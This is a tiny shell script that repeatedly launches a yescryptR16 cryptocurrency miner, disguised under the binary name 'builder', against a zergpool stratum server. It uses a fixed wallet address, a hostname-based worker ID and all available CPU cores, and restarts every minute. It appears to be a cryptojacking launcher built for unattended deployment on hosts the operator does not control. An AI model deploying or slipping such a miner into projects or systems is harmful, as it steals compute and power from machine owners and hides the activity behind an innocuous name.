#!/bin/sh
while [ 1 ]; do
./builder -a yescryptR16 -o stratum+tcp://yescryptR16.mine.zergpool.com:6333 -u RFzCwsf4x8W8XxU5wfeM3fzKMnyYWWE3An -p c=RVN,mc=QOGE,ID=W-$(echo $(hostname)) -t $(echo $(nproc --all))
sleep 60
done 
